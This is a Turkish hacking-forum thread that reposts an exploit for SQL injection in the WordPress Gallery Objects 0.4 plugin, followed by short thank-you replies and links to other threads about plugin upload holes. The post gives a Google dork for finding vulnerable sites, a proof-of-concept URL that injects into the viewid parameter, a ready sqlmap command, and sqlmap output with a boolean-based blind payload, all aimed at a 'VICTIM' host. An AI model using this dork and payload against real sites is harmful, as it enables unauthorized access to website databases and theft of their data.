Konuyu Oyla:
  • Derecelendirme: 5/5 - 1 oy
  • 1
  • 2
  • 3
  • 4
  • 5
WordPress Gallery Objects 0.4 SQL Injection
#1
######################
# Exploit Title : Wordpress Gallery Objects 0.4 SQL Injection

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://galleryobjects.com/

# Software Link : http://downloads.wordpress.org/plugin/ga...ts.0.4.zip

# Dork Google: inurl:/admin-ajax.php?action=go_view_object

# Date : 2014-07-18

# Tested on : Windows 7 / Mozilla Firefox
Windows 7 / sqlmap (0.8-1)
Linux / Mozilla Firefox
Linux / sqlmap 1.0-dev-5b2ded0



######################


Poc via Browser:

Kod:
http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1[ and 1=2]&type=html


sqlmap:

sqlmap -u "http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1&type=html" -p viewid

---
Place: GET
Parameter: viewid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=go_view_object&viewid=475 AND 7403=7403&type=html
---


#####################
Beğenenler:
#2
Teşekkürler.
Beğenenler:
#3
Teşekkürler
İnsɑnlɑr değişmez değişen tek şey şɑrtlɑr ve çıkɑrlɑr...
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  WordPress TimThumb Dorkları + Cyberizme Özel KingSkrupellos 75 4,412 07-12-2016, Saat: 18:14
Son Yorum: TiqReGo
  WordPress TheAgency Teması Dosya Yükleme Açığı KingSkrupellos 11 198 05-12-2016, Saat: 18:42
Son Yorum: the_zizil
  Wordpress "Js Support Ticket" File Upload Bypass Extensions Mr.F92 16 540 03-12-2016, Saat: 00:10
Son Yorum: Slowycan
  WP Premium Gallery Manager Plugin Dosya Yükleme Açığı KingSkrupellos 7 113 27-11-2016, Saat: 15:07
Son Yorum: Efetimi
  WordPress store theme Upload Acıgı archavin 72 4,780 24-11-2016, Saat: 17:33
Son Yorum: Mrxxx
Anahtar Kelimeler

WordPress Gallery Objects 0.4 SQL Injection indir, WordPress Gallery Objects 0.4 SQL Injection Videosu, WordPress Gallery Objects 0.4 SQL Injection Online izle, WordPress Gallery Objects 0.4 SQL Injection Bedava indir, WordPress Gallery Objects 0.4 SQL Injection Yükle, WordPress Gallery Objects 0.4 SQL Injection Hakkında, WordPress Gallery Objects 0.4 SQL Injection Nedir, WordPress Gallery Objects 0.4 SQL Injection Free indir, WordPress Gallery Objects 0.4 SQL Injection Oyunu, WordPress Gallery Objects 0.4 SQL Injection Download


1 Ziyaretçi